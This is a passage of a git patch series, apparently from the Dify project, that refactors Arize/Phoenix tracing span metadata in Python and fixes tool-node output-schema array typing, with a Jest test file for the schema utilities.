trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": self.project, - "message_id": trace_info.message_id, - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." + f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes From 63624dece1ce29e61ac9b0c6d7f1e444430ac6c8 Mon Sep 17 00:00:00 2001 From: Chen Jiaju <619507631@qq.com> Date: Mon, 15 Dec 2025 11:17:15 +0800 Subject: [PATCH 13/68] fix(workflow): tool plugin output_schema array type not selectable in subsequent nodes (#29035) Co-authored-by: Claude --- .../__tests__/output-schema-utils.test.ts | 280 ++++++++++++++++++ .../components/workflow/nodes/tool/default.ts | 25 +- .../nodes/tool/output-schema-utils.ts | 101 +++++++ 3 files changed, 391 insertions(+), 15 deletions(-) create mode 100644 web/app/components/workflow/nodes/tool/__tests__/output-schema-utils.test.ts create mode 100644 web/app/components/workflow/nodes/tool/output-schema-utils.ts diff --git a/web/app/components/workflow/nodes/tool/__tests__/output-schema-utils.test.ts b/web/app/components/workflow/nodes/tool/__tests__/output-schema-utils.test.ts new file mode 100644 index 0000000000..54f3205e81 --- /dev/null +++ b/web/app/components/workflow/nodes/tool/__tests__/output-schema-utils.test.ts @@ -0,0 +1,280 @@ +import { VarType } from '@/app/components/workflow/types' +import { + normalizeJsonSchemaType, + pickItemSchema, + resolveVarType, +} from '../output-schema-utils' + +// Mock the getMatchedSchemaType dependency +jest.mock('../../_base/components/variable/use-match-schema-type', () => ({ + getMatchedSchemaType: (schema: any) => { + // Return schema_type or schemaType if present + return schema?.schema_type || schema?.schemaType || undefined + }, +})) + +describe('output-schema-utils', () => { + describe('normalizeJsonSchemaType', () => { + it('should return undefined for null or undefined schema', () => { + expect(normalizeJsonSchemaType(null)).toBeUndefined() + expect(normalizeJsonSchemaType(undefined)).toBeUndefined() + }) + + it('should return the type directly for simple string type', () => { + expect(normalizeJsonSchemaType({ type: 'string' })).toBe('string') + expect(normalizeJsonSchemaType({ type: 'number' })).toBe('number') + expect(normalizeJsonSchemaType({ type: 'boolean' })).toBe('boolean') + expect(normalizeJsonSchemaType({ type: 'object' })).toBe('object') + expect(normalizeJsonSchemaType({ type: 'array' })).toBe('array') + expect(normalizeJsonSchemaType({ type: 'integer' })).toBe('integer') + }) + + it('should handle array type with nullable (e.g., ["string", "null"])', () => { + expect(normalizeJsonSchemaType({ type: ['string', 'null'] })).toBe('string') + expect(normalizeJsonSchemaType({ type: ['null', 'number'] })).toBe('number') + expect(normalizeJsonSchemaType({ type: ['object', 'null'] })).toBe('object') + }) + + it('should handle oneOf schema', () => { + expect(normalizeJsonSchemaType({ + oneOf: [ + { type: 'string' }, + { type: 'null' }, + ], + })).toBe('string') + }) + + it('should handle anyOf schema', () => { + expect(normalizeJsonSchemaType({ + anyOf: [ + { type: 'number' }, + { type: 'null' }, + ], + })).toBe('number') + }) + + it('should handle allOf schema', () => { + expect(normalizeJsonSchemaType({ + allOf: [ + { type: 'object' }, + ], + })).toBe('object') + }) + + it('should infer object type from properties', () => { + expect(normalizeJsonSchemaType({ + properties: { + name: { type: 'string' }, + }, + })).toBe('object') + }) + + it('should infer array type from items', () => { + expect(normalizeJsonSchemaType({ + items: { type: 'string' }, + })).toBe('array') + }) + + it('should return undefined for empty schema', () => { + expect(normalizeJsonSchemaType({})).toBeUndefined() + }) + }) + + describe('pickItemSchema', () => { + it('should return undefined for null or undefined schema', () => { + expect(pickItemSchema(null)).toBeUndefined() + expect(pickItemSchema(undefined)).toBeUndefined() + }) + + it('should return undefined if no items property', () => { + expect(pickItemSchema({ type: 'array' })).toBeUndefined() + expect(pickItemSchema({})).toBeUndefined() + }) + + it('should return items directly if items is an object', () => { + const itemSchema = { type: 'string' } + expect(pickItemSchema({ items: itemSchema })).toBe(itemSchema) + }) + + it('should return first item if items is an array (tuple schema)', () => { + const firstItem = { type: 'string' } + const secondItem = { type: 'number' } + expect(pickItemSchema({ items: [firstItem, secondItem] })).toBe(firstItem) + }) + }) + + describe('resolveVarType', () => { + describe('primitive types', () => { + it('should resolve string type', () => { + const result = resolveVarType({ type: 'string' }) + expect(result.type).toBe(VarType.string) + }) + + it('should resolve number type', () => { + const result = resolveVarType({ type: 'number' }) + expect(result.type).toBe(VarType.number) + }) + + it('should resolve integer type', () => { + const result = resolveVarType({ type: 'integer' }) + expect(result.type).toBe(VarType.integer) + }) + + it('should resolve boolean type', () => { + const result = resolveVarType({ type: 'boolean' }) + expect(result.type).toBe(VarType.boolean) + }) + + it('should resolve object type', () => { + const result = resolveVarType({ type: 'object' }) + expect(result.type).toBe(VarType.object) + }) + }) + + describe('array types', () => { + it('should resolve array of strings to arrayString', () => { + const result = resolveVarType({ + type: 'array', + items: { type: 'string' }, + }) + expect(result.type).toBe(VarType.arrayString) + }) + + it('should resolve array of numbers to arrayNumber', () => { + const result = resolveVarType({ + type: 'array', + items: { type: 'number' }, + }) + expect(result.type).toBe(VarType.arrayNumber) + }) + + it('should resolve array of integers to arrayNumber', () => { + const result = resolveVarType({ + type: 'array', + items: { type: 'integer' }, + }) + expect(result.type).toBe(VarType.arrayNumber) + }) + + it('should resolve array of booleans to arrayBoolean', () => { + const result = resolveVarType({ + type: 'array', + items: { type: 'boolean' }, + }) + expect(result.type).toBe(VarType.arrayBoolean) + }) + + it('should resolve array of objects to arrayObject', () => { + const result = resolveVarType({ + type: 'array', + items: { + type: 'object', + properties: { + id: { type: 'string' }, + name: { type: 'string' }, + }, + }, + }) + expect(result.type).toBe(VarType.arrayObject) + }) + + it('should resolve array without items to generic array', () => { + const result = resolveVarType({ type: 'array' }) + expect(result.type).toBe(VarType.array) + }) + }) + + describe('complex schema - user scenario (tags field)', () => { + it('should correctly resolve tags array with object items', () => { + // This is the exact schema from the user's issue + const tagsSchema = { + type: 'array', + description: '标签数组', + items: { + type: 'object', + properties: { + id: { + type: 'string', + description: '标签ID', + }, + k: { + type: 'number', + description: '标签类型', + }, + group: { + type: 'number', + description: '标签分组', + }, + }, + }, + } + + const result = resolveVarType(tagsSchema) + expect(result.type).toBe(VarType.arrayObject) + }) + }) + + describe('nullable types', () => { + it('should handle nullable string type', () => { + const result = resolveVarType({ type: ['string', 'null'] }) + expect(result.type).toBe(VarType.string) + }) + + it('should handle nullable array type', () => { + const result = resolveVarType({ + type: ['array', 'null'], + items: { type: 'string' }, + }) + expect(result.type).toBe(VarType.arrayString) + }) + }) + + describe('unknown types', () => { + it('should resolve unknown type to any', () => { + const result = resolveVarType({ type: 'unknown_type' }) + expect(result.type).toBe(VarType.any) + }) + + it('should resolve empty schema to any', () => { + const result = resolveVarType({}) + expect(result.type).toBe(VarType.any) + }) + }) + + describe('file types via schemaType', () => { + it('should resolve object with file schemaType to file', () => { + const result = resolveVarType({ + type: 'object', + schema_type: 'file', + }) + expect(result.type).toBe(VarType.file) + expect(result.schemaType).toBe('file') + }) + + it('should resolve array of files to arrayFile', () => { + const result = resolveVarType({ + type: 'array', + items: { + type: 'object', + schema_type: 'file', + }, + }) + expect(result.type).toBe(VarType.arrayFile) + }) + }) + + describe('nested arrays', () => { + it('should handle array of arrays as generic array', () => { + const result = resolveVarType({ + type: 'array', + items: { + type: 'array', + items: { type: 'string' }, + }, + }) + // Nested arrays fall back to generic array type + expect(result.type).toBe(VarType.array) + }) + }) + }) +}) diff --git a/web/app/components/workflow/nodes/tool/default.ts b/web/app/components/workflow/nodes/tool/default.ts index 5625a6c336..0fcd321a29 100644 --- 